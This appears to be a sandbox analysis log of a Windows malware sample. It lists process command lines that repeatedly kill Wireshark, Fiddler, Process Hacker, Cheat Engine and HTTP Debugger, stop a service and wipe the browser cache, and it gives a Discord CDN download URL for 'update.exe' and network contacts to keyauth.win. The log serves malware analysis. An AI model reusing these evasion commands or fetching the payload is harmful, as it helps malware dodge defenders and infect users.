C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe" MD5

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc59846f8,0x7ffcc5984708,0x7ffcc5984718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3076 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff655505460,0x7ff655505470,0x7ff655505480

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6372 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\update.exe

"C:\Users\Admin\Downloads\update.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 444 -p 5584 -ip 5584

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5584 -s 752

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Downloads\update.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\unnamed_logs.txt

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\un.ini

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1264 /prefetch:8

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 8.8.8.8:53 keyauth.win udp
US 172.64.136.33:443 keyauth.win tcp
N/A 127.0.0.1:49829 tcp
N/A 127.0.0.1:49831 tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 smartscreen-prod.microsoft.com udp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 204.79.197.200:443 www.bing.com tcp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
IE 20.82.250.189:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google udp
US 13.107.21.200:443 www.bing.com tcp
US 204.79.197.239:443 tcp
NL 95.101.78.82:80 tcp
NL 95.101.78.82:80 tcp
N/A 224.0.0.251:5353 udp
NL 104.80.225.205:443 tcp
FR 51.11.192.48:443 tcp
US 8.8.4.4:443 dns.google udp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 assets.msn.com tcp
NL 23.73.0.144:443 assets.msn.com tcp
NL 23.73.0.144:443 tcp
NL 65.9.86.26:443 tcp
FR 2.22.22.128:443 tcp
IE 20.234.93.27:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.239:443 tcp
NL 104.109.143.22:443 deff.nelreports.net tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 172.64.136.33:443 keyauth.win tcp
US 172.64.136.33:443 keyauth.win tcp
N/A 127.0.0.1:50413 tcp
N/A 127.0.0.1:50415 tcp
N/A 127.0.0.1:50418 tcp
N/A 127.0.0.1:50420 tcp
